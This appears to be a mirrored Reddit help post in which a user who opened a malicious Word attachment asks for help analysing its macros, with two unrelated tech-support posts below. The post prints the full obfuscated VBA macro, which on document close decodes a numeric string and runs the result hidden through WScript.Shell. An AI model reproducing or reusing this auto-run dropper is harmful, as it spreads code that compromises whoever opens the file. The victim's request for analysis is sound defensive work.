Skip to main content

Received a Word document by email with malware. Can someone help me analyze this?

I received a Word document by email. It appeared to come from a known sender as part of a message chain that had actually occurred (i.e. the text content was legitimate).

People faking senders, I catch all the time. Having the correct content threw me off and I opened the Word document. Upon closing the document, My firewall told me that Powershell was requesting internet access - which I denied, as I recognized what was going on. I deleted my temp folder contents and immediately ran a virus scan - but this isn't going to be caught.

I went back into the Word document - sandboxed, this time - and I extracted the macros. I believe it creates an executable - or at least, an executable script, and then runs it.

I need help determining what the final script is so that I can see what damage was done and whether there's anything left on my machine.

Malware Word Macros:

Public Function scala(ByVal scivolo As Integer) As String calcolo = Array("c", "a", ".", "+", "z", "/", "r", "h", "n", "\", "(", "P", "b", "k", "g", "p", "j", ":", "x", ")", "D", "i", "f", " ", "v", "B", "d", "$", "t", "S", "W", "w", "F", ";", "m", "=", "l", "E", "T", "y", "-", "G", "?", "C", "O", "o", "e", "'", "N", "A", "q", "s", ",") Dim sino As Integer For sino = LBound(calcolo) To UBound(calcolo) If sino = scivolo Then scala = calcolo(sino) End If Next End Function Public Function dinamico(valgo As String) If Len(valgo) < 4774 Then CreateObject("WScript.Shell").Run valgo, vbHide * 4 End If End Function Sub Document_Close() feralo = bordo("15453146065107463636234048453718212823403718460023253915015151234043453434010826231048463140441216460028232939512846340248462802304612433621460828190220453108364501263221364610470728281517050526452116502250080731465031461501150145510200453405292905280108135116023604344752232746082417491111204938492303234709042232410246184647193323292801062840110645004651512327460824174911112049384947090422324102461846473323104846314044121646002823293951284634024846280230461243362146082819022045310836450126292806210814104707282815170505264521165022500807314650314615011501455102004534055102150715422126352801081351164719") Application.Run "dinamico", feralo End Sub Function pirolisi(ByVal foro, ByVal baco) As String valletta = LTrim(vbNullString) & vbNullString roba = Array(foro, baco) For peso = 0 To UBound(roba) valletta = valletta + vbNullString + roba(peso) + vbNullString Next pirolisi = valletta End Function Function bordo(Optional dozzina As String, Optional dozzina2) aspirato = minerale(dozzina) brindare = Trim(vbNullString) & vbNullString For sino = 0 To Len(dozzina) If (sino + 1) <= UBound(aspirato) Then fiore = aspirato(sino + 1) sfarzoso = aspirato(sino) voragine = Int(sfarzoso + fiore) mucosa = scala(voragine) brindare = pirolisi(brindare, mucosa) sino = sino + 1 End If Next bordo = brindare End Function Function minerale(onere As String, Optional asettico As Integer) As Variant minerale = Split(Left(StrConv(onere, vbUnicode), Len(StrConv(onere, vbUnicode)) - 1), vbNullChar) End Function ---

I would be very grateful if someone could give me a hand with this.



Submitted November 29, 2017 at 08:07PM by PurloinedSentience http://ift.tt/2AGUc9D
Labels:

Comments

Post a Comment

Popular posts from this blog

certain keys on my keyboard dont work when "cold"

Hi guys, i have a Lenovo Y520-15IKBN (80WK) and certain keys on the keyboard don't work (e,g,h,8,9,Fn...) but only when the weather is cold. for example in the winter it used to work after certain amount of time when i first boot the laptop and stops working when i stop using it for a while, but now that the weather is hot it works just fine except for the first couple of minutes or when its colder. of course i do realise that it has nothing to do with the outside weather but with the temperature of the computer itself. can someone explain to me why this is happening and how it should be fixed as i cannot take it to the tech service until july even though it's still under warranty because i need it for school. ps: an external keyboard works fine. Submitted April 29, 2018 at 03:35PM by AMmej https://ift.tt/2KiQg05
Post a Comment
Read more

Old PC with a Foxconn n15235 motherboard needs drivers! Help!!

So my Pc corrupted and I had to fresh install windows on it, but now its missing 3 drivers and one of them is for the Ethernet controller! I've tried searching everywhere for the windows 7 drivers but all I seem to find are some dodgey programs saying they will install it for me. Problem is without the ethernet driver I can't bloody connect to the internet. I've been using a USB to try get some drivers on there, but they just end up being useless programmes . I'm also a bit of a noob at these things, I don't understand where to find the names of things in my PC, I've opened it up but I don't understand whats significant and what isnt. If someone has the drivers and can teach me how to install them I'd be very appreciative! Submitted April 29, 2018 at 02:47PM by darrilsteady https://ift.tt/2r76xMZ
Post a Comment
Read more